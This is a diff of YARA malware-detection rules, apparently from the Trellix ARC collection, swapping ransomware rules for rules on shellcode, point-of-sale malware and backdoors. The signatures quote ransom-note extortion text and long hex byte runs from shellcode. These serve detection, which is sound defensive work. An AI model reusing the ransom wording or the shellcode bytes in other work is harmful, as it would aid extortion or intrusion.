+		logic_hash = "5fa54c41a423d776d05bdac5b171ee685f54372b4e6aa41b57cce769ac2c6976"
 		score = 75
 		quality = 70
-		tags = "RANSOMWARE, FILE"
+		tags = "SHELLCODE, FILE"
 		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransom:W32/Clop"
+		malware_type = "shellcode"
+		malware_family = "ShellCode:W32/MyKins"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$s1 = "If you want to restore your files write to emails" fullword ascii
-		$s2 = "All files on each host in the network have been encrypted with a strong algorithm." fullword ascii
-		$s3 = "Shadow copies also removed, so F8 or any other methods may damage encrypted data but not recover." fullword ascii
-		$s4 = "You will receive decrypted samples and our conditions how to get the decoder." fullword ascii
-		$s5 = "DO NOT RENAME OR MOVE the encrypted and readme files." fullword ascii
-		$s6 = "(Less than 6 Mb each, non-archived and your files should not contain valuable information" fullword ascii
-		$s7 = "We exclusively have decryption software for your situation" fullword ascii
-		$s8 = "Do not rename encrypted files." fullword ascii
-		$s9 = "DO NOT DELETE readme files." fullword ascii
-		$s10 = "Nothing personal just business" fullword ascii
-		$s11 = "eqaltech.su" fullword ascii
+		$a = { 4883EC28E847000000488D0DF0FFFFFF488D1539000000482BCA4803C14883C428C3CCCC488D05D5FFFFFF482BC8488BC1C3CCCC4883EC28E83F0D000033C04883C428C3CCCCCCCCCCCCCCCCCCCCCCCCE8000000005848B95510004001000000482BC148B950100040010000004803C1C3CCCCCC48897C24084C8BC94D85C0740C488BF9480FBEC2498BC8F3AA488B7C2408498BC1C3CCCC40534883EC20488BD9E85AFFFFFF488D0D53FFFFFF482BD94803C34883C4205BC3CCCCCC33D28BC2EB06FFC04883C10266391175F5F3C3CC668339004C8BC1740B4983C002664183380075F54C2BC20FB70266418904104883C2026685C075EF488BC1C34C8BC14C2BC20FB70266418904104883C2026685C075EF488BC1C3CC4C8BC14C2BC28A024188041048FFC284C075F3488BC1C3CC8039004C8BC1740949FFC04180380075F74C2BC28A024188041048FFC284C075F3488BC1C3CCCCCC48895C24084533D2458BCA4585C07E320FB702663901741A0FB719440FB7D88BC3412BC383F8207409442BDB4183FB20751041FFC14883C1024883C202453BC87CCE488B5C2408453BC8410F95C2418BC2C3CCCC4533C948895108458BC16644390A740D41FFC04963C06644390C4275F3664503C066448901664183C0026644894102C34883EC3833C04C8BD233D248895424228954242A668954242E66894424204885C9741A4D85D27415488BD1488D4C2420E89BFFFFFF488D4C242041FFD24883C438C3CCCC4883EC284863C14C8BCA4C8D44243833D233C94869C0F0D8FFFF488944243841FFD14883C428C3CC48895C241048897C241855488BEC4883EC604883651000488365C800488365D800488365E000488365F000488365F800498BD9498BF848894DC0488BC24C8D4DC04C8D45D0488D4D10BAFFFF1F00C745D030000000C745E840020000FFD0488B4D104885C9740DBA01000000FFD7488B4D10FFD34C8D5C2460498B5B18498B7B20498BE35DC3CCCC488BC44889580848896810565741544883EC308360D80083601800498BF18BEA4C8BE1498BD833FF4C8D4818488D50D88D4F054533C0FFD3894424208B44246085C0750733C0E9C20000008D14004533C033C9FFD6448B4424604C8D4C2460488BD0B9050000004503C0488BF0FFD38944242085C0740B33D2488BCEFF542470EBC28B4C246048B81986611886611886488BDE48F7E1482BCA48D1E94803CA48C1E908894C2460488B4B404885C9742E0FB743383BC57C262BC5992BC2D1F84C63C8781A8BC54A8D0C49992BC2498BD4D1F8448BC0E8AEFDFFFF85C0740B393B740B8B034803D8EBBE488B7B50488B4424784885C0740A4885FF7405488918EB0933D2488BCEFF542470488BC7488B5C2450488B6C24584883C430415C5F5EC3C20000CC4585C07410482BCA8A0288041148FFC241FFC875F3F3C3CC40534883EC20488BD9E8E6FBFFFF488D0DDFFBFFFF482BD94803C34883C4205BC3CCCCCC48895C2408488974241048897C24185541544155488BEC4883EC404863413C4C8BC1B90B020000488BF2C745E04D6D4765C745E474537973C745E874656D52C745EC6F757469C745F06E654164C745F46472657366C745F873006642394C00180F8584000000428B8400880000004533D24903C08B50208B58248B781C448B68184903D04903D84903F84585ED745B8B024533C94903C044380874234C8D5DE0488BC84C2BD8458A240B4584E47410443821750B48FFC149FFC180390075E741803C0100750842807C0DE000740E41FFC24883C204453BD57310EBB3420FB70C538B048F4903C0488906488B1E4885DB750883C8FFE9E1020000488D0D47340000E8D6FEFFFF488BD3488BC8E89BFCFFFF488D0D5034000048898690000000E8B8FEFFFF488B16488BC8E87DFCFFFF488D0D5A34000048898698000000E89AFEFFFF488B16488BC8E85FFCFFFF488D0D6C34000048894608E87FFEFFFF488B16488BC8E844FCFFFF488D0D8934000048894610E864FEFFFF488B16488BC8E829FCFFFF488D0D9E34000048894618E849FEFFFF488B16488BC8E80EFCFFFF488D0DAB34000048894620E82EFEFFFF488B16488BC8E8F3FBFFFF488D0DC834000048894628E813FEFFFF488B16488BC8E8D8FBFFFF488D0DE534000048894630E8F8FDFFFF488B16488BC8E8BDFBFFFF488D0D0235000048894638E8DDFDFFFF488B16488BC8E8A2FBFFFF488D0DF734000048894640E8C2FDFFFF488B16488BC8E887FBFFFF488D0DFC34000048894648E8A7FDFFFF488B16488BC8E86CFBFFFF488D0D0935000048894650E88CFDFFFF488B16488BC8E851FBFFFF488D0D0E35000048894658E871FDFFFF488BC8488B16E836FBFFFF488D0D2B35000048894660E856FDFFFF488B16488BC8E81BFBFFFF488D0D5035000048894668E83BFDFFFF488B16488BC8E800FBFFFF488D0D5D35000048894670E820FDFFFF488B16488BC8E8E5FAFFFF488D0D7235000048894678E805FDFFFF488B16488BC8E8CAFAFFFF488D0D8735000048898680000000E8E7FCFFFF488B16488BC8E8ACFAFFFF488D0D8935000048898688000000E8C9FCFFFF488B16488BC8E88EFAFFFF488D0D8B350000488986A0000000E8ABFCFFFF488B16488BC8E870FAFFFF488D0D95350000488986A8000000E88DFCFFFF488B16488BC8E852FAFFFF488D0DA7350000488986B0000000E86FFCFFFF488B16488BC8E834FAFFFF488D0DA1350000488986B8000000E851FCFFFF488B16488BC8E816FAFFFF488D0DA3350000488986C0000000E833FCFFFF488B16488BC8E8F8F9FFFF488D0DA5350000488986C8000000E815FCFFFF488B16488BC8E8DAF9FFFF488986D000000033C0488B5C2460488B742468488B7C24704883C440415D415C5DC348895C24085556574154415541564157488DAC2410FEFFFF4881ECF00200004533FF488BD9498BF8488BF2488D8DE100000041B80301000033D24C897C24504C897C24604C897C24704C897C24684C89BD480200004488BDE0000000E8EFF7FFFF488D4DC0C745C01C010000FF9688000000837DC40675488B45C885C0752780BDDA00000001754D83C8FF488B9C24300300004881C4F0020000415F415E415D415C5F5E5DC383F801742A83F802740583F80375D380BDDA000000017517EBC8837DC40A75C244397DC875BC80BDDA0000000175B3488BD7488BCBFF56384C393F74A541BD300000004C897C243041BE000000084C8D8D380200004C8D442478488D4C2460418D55DEBB00020000448974242848C785380200004729000044896C24784C897D80895D904C897D884C897D984C897DA0C744242040000000FF96900000004C397C24607509418D45CEE937FFFFFF895D90BB040000004C897C24304C8D8D380200004C8D442478488D4C24708D530241BC1F4C1000448974242844896C24784C897D804C897D884C89A5380200004C897D984C897DA0895C2420FF9690000000488B0F4C8D7708498BD64C8975B0FF5678488B4C2460C74424484000000044897C2440C744243802000000488D44245048894424304C8D85480200004533C94883CAFF4C897C242848C744242000200000FF9698000000488B4C2470895C244844897C2440C744243802000000488D44245048894424304C8D4424684533C94883CAFF4C897C24284C897C24504C89642420 }
+		$b = { E800000000582D051040000500104000C3558BEC8B45082D001040005DC20400558BECFF7508E80A0A000033C05DC20400558BEC8B4D1085C9741F0FB6450C69C0010101018BD153578B7D08C1E902F3AB8BCA83E103F3AA5F5B8B45085DC3558BECE899FFFFFF8B4D0881E90010400003C15DC20400558BEC8B4D0833C066390174084066833C410075F85DC20400558BEC8B450866833800568BF0740983C60266833E0075F78B4D0C2BF10FB7116689140E83C1026685D275F15E5DC20800558BEC8B55088B450C2BD00FB70866890C0283C0026685C975F18B45085DC20800558BEC8B55088B450C2BD08A08880C024084C975F68B45085DC20800558BEC8B4508803800568BF0740646803E0075FA8B4D0C2BF18A1188140E4184D275F65E5DC20800558BEC5633F63975107E2D8B45088B4D0C0FB704700FB70C71663BC174148BD08BC18BCA2BC883F92074072BC283F8207506463B75107CD333C03B75105E0F95C05DC20C00558BEC8B450C8B550850894204E8FAFEFFFF03C066890283C002668942025DC20800558BEC51515733C0668945F88D7DFAAB33C966AB5F394D08741A394D0C7415FF75088D45F850E8B3FFFFFF8D45F850FF550C8BC88BC1C9C20800558BEC51518B45086AFF9968F0D8FFFF5250E8730A00008945F88D45F8506A006A008955FCFF550CC9C20800558BEC83EC248B4508568945F48D45F4508D45DC5033F668FFFF1F008D45FC508975FC8975F8C745DC180000008975E0C745E8400200008975E48975EC8975F0FF550C3975FC5E740E6A01FF75FCFF5510FF75FCFF5514C9C21000558BEC83EC0C538D45FC5033DB538D45F8506A05895DF8895DFCFF55108945F88B45FC3BC3750733C0E99E000000565303C05053FF55148BF08D45FC508B45FC03C050566A05897514FF55108945F83BC374095356FF551833C0EB6F8B45FC33D2B9F8000000F7F1578945FC8B7E3C3BFB742E0FB746383B450C7C252B450C992BC28BC8D1F978198B450C992BC2D1F850FF75088D044F50E83BFEFFFF85C0740A8B063BC3740903F0EBC18B7E44EB028BFB8B451C3BC374083BFB74048930EB0753FF7514FF55188BC75F5E5BC9C21800C21400558BEC837D100074178B4D088B450C2BC88A10FF4D1088140140837D100075F15DC20C00558BECE8B3FCFFFF8B4D0881E90010400003C15DC20400558BEC83EC2C538B5D088B433CB90B010000568B750CC745D44D6D4765C745D874537973C745DC74656D52C745E06F757469C745E46E654164C745E86472657366C745EC730066394C18180F858F0000008B44187803C38B501C8B482003D3578B78248B40188955F033D203CB03FB8955FC8945F485C07466EB038B5D088B149183650C0003D3803A0074238D5DD42BDA8BC2895DF8EB038B5DF88A1C0384DB740D38187509FF450C4080380075E98B450C803C10007507807C05D400740E8B55FC428955FC3B55F472B0EB128B45FC0FB704478B4DF08B048103450889065F8B0685C0750883C8FFE9230200005068D0414000E8F0FEFFFF50E831FDFFFFFF3689464868F0414000E8DBFEFFFF50E81CFDFFFFFF3689464C6818424000E8C6FEFFFF50E807FDFFFFFF368946046844424000E8B1FEFFFF50E8F2FCFFFFFF368946086878424000E89CFEFFFF50E8DDFCFFFFFF3689460C68A8424000E887FEFFFF50E8C8FCFFFFFF3689461068CC424000E872FEFFFF50E8B3FCFFFFFF368946146800434000E85DFEFFFF50E89EFCFFFFFF368946186834434000E848FEFFFF50E889FCFFFFFF3689461C686C434000E833FEFFFF50E874FCFFFFFF36894620687C434000E81EFEFFFF50E85FFCFFFFFF36894624689C434000E809FEFFFF50E84AFCFFFFFF3689462868C0434000E8F4FDFFFF50E835FCFFFFFF3689462C68DC434000E8DFFDFFFF50E820FCFFFFFF368946306810444000E8CAFDFFFF50E80BFCFFFFFF36894634684C444000E8B5FDFFFF50E8F6FBFFFFFF368946386874444000E8A0FDFFFF50E8E1FBFFFFFF3689463C68A0444000E88BFDFFFF50E8CCFBFFFFFF3689464068D0444000E876FDFFFF50E8B7FBFFFFFF3689464468EC444000E861FDFFFF50E8A2FBFFFFFF368946506808454000E84CFDFFFF50E88DFBFFFFFF368946546830454000E837FDFFFF50E878FBFFFFFF36894658685C454000E822FDFFFF50E863FBFFFFFF3689465C6870454000E80DFDFFFF50E84EFBFFFFFF368946606890454000E8F8FCFFFF50E839FBFFFFFF3689466468AC454000E8E3FCFFFF50E824FBFFFF89466833C05E5BC9C20800558BEC81EC5C020000535633DB5768030100008D85A5FDFFFF5350895DF8895DE8895DDC895DF4895DFC889DA4FDFFFFE889F9FFFF8B7D0C83C40C8D85A8FEFFFF50C785A8FEFFFF1C010000FF574483BDACFEFFFF05751283BDB0FEFFFF02743983BDB0FEFFFF01EB2E83BDACFEFFFF06750E399DB0FEFFFF7510807DC201751983C8FF5F5E5BC9C20C0083BDB0FEFFFF0175ED807DC20175E78B751056FF7508FF571C391E74D95368000000086A408D45EC508D45C4506A0E8D45E850C745EC47250000895DF0C745C418000000895DC8C745D000020000895DCC895DD4895DD8FF5748395DE875056AFE58EB955368000000086A048D45EC508D45C4506A068D45DCBE0B4C1000508975EC895DF0C745C418000000895DC8C745D000020000895DCC895DD4895DD8FF57488B45108D480451FF30894DE0FF573C6A40536A028D45F850536800200000538D45FC506AFFFF75E8FF574C6A04536A028D45F8505356538D45F4506AFFFF75DC895DF88975EC895DF0FF574C395DFC0F84330200008B75F43BF30F8428020000895E048B85B4FEFFFF8946108B85ACFEFFFF8946088B85B0FEFFFF89460C6A0C5889462C8946308B4510C7060C3C1000C7462830000000C746342C000000C7463818000000C7463CA80100008B401C894618895D0C6840464000E800F8FFFF8BC88B450C8A0C0180F10D888C05A4FDFFFF4089450C3D040100007CD98D8DA4FDFFFF8D46405150E855F8FFFF6844474000E8C9F7FFFF508D464050E85DF8FFFF8B45108B40283BC3742C8B4E1883F902750A8B40200504020000EB0D83F90375158B40200500010000508D860001000050E80BF8FFFFE825F7FFFFB9881C400081E90010400003C189450C33C9EB038B450C8A04088B55FC88040A4181F94825000072EB535353680C3C100056FF572C8BF03BF37460536A0156FF57386A1053536A015356FF57348B75108946203BC37447C680040200004E8B4620C68005020000538B4620C680060200002E8B4620C68007020000658B4620C68008020000788B4620C68009020000658B462088980A020000EB038B75108B46243BC30F8497000000895D083958040F868B000000895D0C8B46248B4D0C8B8401DC0000008D4D105150895D10FF5714395D107455FF7510FF57683B06754B536A3053FF57048945E43BC3743DE833F6FFFF53B91E13400081E90010400003C18B4DFC6A0183C12051535053FF7510FF75E4FF57245353FF75F4FF75E4FF5728FF770C6A01E8C1F7FFFFFF45088B46248B4D0883450C403B48040F8278FFFFFFFF75E0FF574033C0E9CFFCFFFFFF75E0FF57406AFDE92AFDFFFF558BEC81EC0C020000565733F66A688D8540FFFFFF565089B53CFFFFFFE8DAF5FFFF83C40C6A0A5933C06A0A8975A88D7DACF3AB5989B510FFFFFF8DBD14FFFFFFF3AB8D45A8898538FFFFFF8D853CFFFFFF50FF7508C745C401000000C7852CFFFFFF02000000E8BBF8FFFF85C00F8582010000538D85F4FDFFFF50C785F4FDFFFF1C010000FF5580BBEC45400083BDF8FDFFFF05750353EB0568D0454000E86CF8FFFF8D4DCC51FFB54CFFFFFFFFB540FFFFFFFFB544FFFFFF6A1850E856F7FFFFFFB548FFFFFF8BF83BFE750C68D0070000E8B9F6FFFFEBB46888130000E8ADF6FFFF8D45A8508D853CFFFFFF5057E849FBFFFF85C00F85F8000000EB10FFB548FFFFFF68D0070000E882F6FFFF8B45C883781C0175E783BDF8FDFFFF05750E6808464000E8E5F7FFFF6A16EB0C68D0454000E8D7F7FFFF6A18598D9534FFFFFF52FFB54CFFFFFFFFB540FFFFFFFFB544FFFFFF5150E8BCF6FFFF }
 
 	condition:
-		( uint16( 0 ) == 0x6f59 ) and filesize < 10KB and all of them
+		filesize < 1KB and any of them
 }
-rule TRELLIX_ARC_Cryptonar_Ransomware : RANSOMWARE FILE
+rule TRELLIX_ARC_Kartoxa_Malware_Pdb : POS FILE
 {
 	meta:
-		description = "Rule to detect CryptoNar Ransomware"
+		description = "Rule to detect Kartoxa POS based on the PDB"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "0911250f-fc1f-58bc-ac09-d77d2a2ed3ce"
-		date = "2026-02-01"
+		id = "3d2dbf22-5d8f-5f19-9048-2d021ada22c8"
+		date = "2010-10-09"
 		modified = "2020-08-14"
-		reference = "https://www.bleepingcomputer.com/news/security/cryptonar-ransomware-discovered-and-quickly-decrypted/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_CryptoNar.yar#L1-L36"
+		reference = "https://securitynews.sonicwall.com/xmlpost/guatambu-new-multi-component-infostealer-drops-kartoxa-pos-malware-apr-08-2016/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_backdoor_katorxa_pdb.yar#L1-L25"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "04c1c4f45ad3552aa0876c3b645c6ca92493018f7fdc5d9d9ed26cf67199d21b"
+		hash = "86dd21b8388f23371d680e2632d0855b442f0fa7e93cd009d6e762715ba2d054"
+		logic_hash = "6e1810af386f3aada4cd1d72f76d8210d201808c8fe1d21d379ff1a825d93710"
 		score = 75
 		quality = 70
-		tags = "RANSOMWARE, FILE"
-		malware_type = "ransomware"
-		malware_family = "Ransom:W32/CryptoNar"
+		tags = "POS, FILE"
+		rule_version = "v1"
+		malware_type = "pos"
+		malware_family = "Pos:W32/Kartoxa"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$s1 = "C:\\narnar\\CryptoNar\\CryptoNarDecryptor\\obj\\Debug\\CryptoNar.pdb" fullword ascii
-		$s2 = "CryptoNarDecryptor.exe" fullword wide
-		$s3 = "server will eliminate the key after 72 hours since its generation (since the moment your computer was infected). Once this has " fullword ascii
-		$s4 = "Do not delete this file, else the decryption process will be broken" fullword wide
-		$s5 = "key you received, and wait until the decryption process is done." fullword ascii
-		$s6 = "In order to receive your decryption key, you will have to pay $200 in bitcoins to this bitcoin address: [bitcoin address]" fullword ascii
-		$s7 = "Decryption process failed" fullword wide
-		$s8 = "CryptoNarDecryptor.KeyValidationWindow.resources" fullword ascii
-		$s9 = "Important note: Removing CryptoNar will not restore access to your encrypted files." fullword ascii
-		$s10 = "johnsmith987654@tutanota.com" fullword wide
-		$s11 = "Decryption process will start soon" fullword wide
-		$s12 = "CryptoNarDecryptor.DecryptionProgressBarForm.resources" fullword ascii
-		$s13 = "DecryptionProcessProgressBar" fullword wide
-		$s14 = "CryptoNarDecryptor.Properties.Resources.resources" fullword ascii
+		$pdb = "\\vm\\devel\\dark\\mmon\\Release\\mmon.pdb"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 2000KB ) and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and any of them
 }
-rule TRELLIX_ARC_Installer_Coronavirus : RANSOMWARE FILE
+rule TRELLIX_ARC_Redline_Payload : BACKDOOR FILE
 {
 	meta:
-		description = "Rule to detect the Corona Virus Installer"
+		description = "Rule to detect the RedLine payload"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "2a224529-bfc7-57ed-91c3-426cae4b7895"
-		date = "2020-03-25"
+		id = "61c2032f-1e6b-5123-8f99-ff83ae95e8a9"
+		date = "2020-04-16"
 		modified = "2020-08-14"
-		reference = "https://twitter.com/malwrhunterteam/status/1238056503493505024"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_coronavirus.yar#L1-L41"
+		reference = "https://www.proofpoint.com/us/threat-insight/post/new-redline-stealer-distributed-using-coronavirus-themed-email-campaign"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_redline.yar#L1-L38"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "5987a6e42c3412086b7c9067dc25f1aaa659b2b123581899e9df92cb7907a3ed"
-		logic_hash = "26be8bbfbf615967cc2a0e2d4179cd5f444c53f170a681d2ec236244881dc629"
+		hash = "5df956f08d6ad0559efcdb7b7a59b2f3b95dee9e2aa6b76602c46e2aba855eff"
+		logic_hash = "44df161b7434b9137ca5bb919eb314f8447b216b3f6e1214606a898fb36ee4f4"
 		score = 75
-		quality = 62
-		tags = "RANSOMWARE, FILE"
+		quality = 70
+		tags = "BACKDOOR, FILE"
 		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransom:W32/CoronaVirus"
+		malware_type = "backdoor"
+		malware_family = "Backdoor:W32/RedLine"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$s1 = { 61 63 68 65 6C 6C 69 65 73 40 68 6F 74 6D 61 69 6C 2E 63 6F 6D }
-		$s2 = { 74 6F 6A 65 6E 2E 6D 65 40 67 6D 61 69 6C 2E 63 6F 6D }
-		$s4 = { 77 61 6E 67 63 68 79 7A 40 67 6D 61 69 6C 2E 63 6F 6D }
-		$s5 = { 54 00 6F 00 64 00 6F 00 73 00 20 00 6C 00 6F 00 73 00 20 00 74 00 69 00 70 00 6F 00 73 00 20 00 64 00 65 00 20 00 69 00 6D 00 61 00 67 00 65 00 6E 00 7C 00 2A 00 2E 00 62 00 6D 00 70 00 3B 00 2A 00 2E 00 63 00 75 00 72 00 3B 00 2A 00 2E 00 64 00 69 00 62 00 3B 00 2A 00 2E 00 65 00 6D 00 66 00 3B 00 2A 00 2E 00 69 00 63 00 6F 00 3B 00 2A 00 2E 00 77 00 6D 00 66 00 7C 00 4D 00 61 00 70 00 61 00 73 00 20 00 64 00 65 00 20 00 62 00 69 00 74 00 73 00 20 00 28 00 2A 00 2E 00 62 00 6D 00 70 00 3B 00 2A 00 2E 00 64 00 69 00 62 00 29 00 7C 00 2A 00 2E 00 62 00 6D 00 70 00 3B 00 2A 00 2E 00 64 00 69 00 62 00 7C 00 49 00 63 00 6F 00 6E 00 6F 00 73 00 2F 00 63 00 75 00 72 00 73 00 6F 00 72 00 65 00 73 00 20 00 28 00 2A 00 2E 00 69 00 63 00 6F 00 3B 00 2A 00 2E 00 63 00 75 00 72 00 29 00 7C 00 2A 00 2E 00 69 00 63 00 6F 00 3B 00 2A 00 2E 00 63 00 75 00 72 00 7C 00 4D 00 65 00 74 00 61 00 61 00 72 00 63 00 68 00 69 00 76 00 6F 00 73 00 20 00 28 00 2A 00 2E 00 77 00 6D 00 66 00 3B 00 2A 00 2E 00 65 00 6D 00 66 00 29 00 7C 00 2A 00 2E 00 77 00 6D 00 66 00 3B 00 2A 00 2E 00 65 00 6D 00 66 00 7C 00 54 00 6F 00 64 00 6F 00 73 00 20 00 6C 00 6F 00 73 00 20 00 61 00 72 00 63 00 68 00 69 00 76 00 6F 00 73 00 20 00 28 00 2A 00 2E 00 2A 00 29 00 7C 00 2A 00 2E 00 2A 00 7C 00 7C 00 }
-		$s6 = { 48 00 54 00 4D 00 4C 00 5F 00 49 00 4D 00 47 00 23 00 49 00 44 00 52 00 5F 00 48 00 54 00 4D 00 5F 00 49 00 4D 00 41 00 47 00 45 00 53 00 5F 00 4C 00 49 00 5F 00 43 00 41 00 50 00 54 00 49 00 4F 00 4E 00 5F 00 48 00 4F 00 56 00 45 00 52 00 5F 00 50 00 4E 00 47 00 29 00 49 00 44 00 52 00 5F 00 48 00 54 00 4D 00 5F 00 49 00 4D 00 41 00 47 00 45 00 53 00 5F 00 53 00 42 00 5F 00 48 00 5F 00 53 00 43 00 52 00 4F 00 4C 00 4C 00 5F 00 50 00 52 00 45 00 56 00 5F 00 48 00 4F 00 56 00 45 00 52 00 5F 00 50 00 4E 00 47 00 31 00 49 00 44 00 52 00 5F 00 48 00 54 00 4D 00 5F 00 49 00 4D 00 47 00 5F 00 50 00 41 00 47 00 45 00 5F 00 54 00 49 00 54 00 4C 00 45 00 5F 00 49 00 43 00 4F 00 4E 00 5F 00 4D 00 45 00 4E 00 55 00 5F 00 4F 00 52 00 41 00 4E 00 47 00 45 00 5F 00 43 00 4C 00 4F 00 53 00 45 00 5F 00 50 00 4E 00 47 00 32 00 49 00 44 00 52 00 5F 00 48 00 54 00 4D 00 5F 00 49 00 4D 00 47 00 5F 00 50 00 41 00 47 00 45 00 5F 00 54 00 49 00 54 00 4C 00 45 00 5F 00 49 00 43 00 4F 00 4E 00 5F 00 4D 00 45 00 4E 00 55 00 5F 00 50 00 41 00 49 00 44 00 5F 00 53 00 45 00 54 00 54 00 49 00 4E 00 47 00 53 00 5F 00 50 00 4E 00 47 00 }
-		$s7 = { 25 73 5C 6C 6F 67 5F 25 30 34 64 25 30 32 64 25 30 32 64 5F 25 64 2E 6C 6F 67 }
+		$s1 = "Cambrel.exe" fullword ascii
+		$s2 = { 22 00 54 00 65 00 78 00 74 00 49 00 6e 00 70 00 75 00 74 00 46 00 72 00 61 00 6d 00 65 00 77 00 6f 00 72 00 6b 00 2e 00 44 00 59 00 4e 00 4c 00 49 00 4e 00 4b 00 22 00 }
+		$op0 = { 06 7c 34 00 00 04 7b 17 00 00 04 7e 21 00 00 0a }
+		$op1 = { 96 00 92 0e 83 02 02 00 f4 20 }
+		$op2 = { 03 00 c6 01 d9 08 1b 03 44 }
+		$p0 = { 80 00 96 20 83 11 b7 02 10 }
+		$p1 = { 20 01 00 72 0f 00 20 02 00 8a 0f 00 20 03 00 61 }
+		$p2 = { 03 00 c6 01 cd 06 13 03 79 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3000KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 60KB and all of ( $s* ) and all of ( $op* ) or all of ( $p* )
 }
-rule TRELLIX_ARC_Ransomware_Coronavirus : RANSOMWARE FILE
+rule TRELLIX_ARC_Malw_Likseput_Backdoor_Pdb : BACKDOOR FILE
 {
 	meta:
-		description = "Rule to detect the Corona Virus ransomware"
+		description = "Rule to detect Likseput backdoor based on the PDB"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "4195a57b-cd51-5050-861a-6436f7ec4eca"
-		date = "2020-03-25"
+		id = "2193daf8-016b-5f49-97ec-b821c8da22f6"
+		date = "2011-03-26"
 		modified = "2020-08-14"
-		reference = "https://twitter.com/malwrhunterteam/status/1238056503493505024"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_coronavirus.yar#L43-L80"
+		reference = "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/bkdr_likseput.e"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_likseput_backdoor_pdb.yar#L1-L25"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "3299f07bc0711b3587fe8a1c6bf3ee6bcbc14cb775f64b28a61d72ebcb8968d3"
-		logic_hash = "2a7e1676a20f30b0cb0321579bb85e4836e2aee5f56b838d2ff2bec7a08c489f"
+		hash = "993b36370854587f4eef3366562f01ab87bc4f7b88a21f07b44bd5051340386d"
+		logic_hash = "2afc4b7e6a5f0d9fed9a075aebaac8157e843c83c55c3f2255431bb6a03459ec"
 		score = 75
-		quality = 64
-		tags = "RANSOMWARE, FILE"
+		quality = 70
+		tags = "BACKDOOR, FILE"
 		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransom:W32/CoronaVirus"
+		malware_type = "backdoor"
+		malware_family = "Backdoor:W32/Likseput"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$s1 = { 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 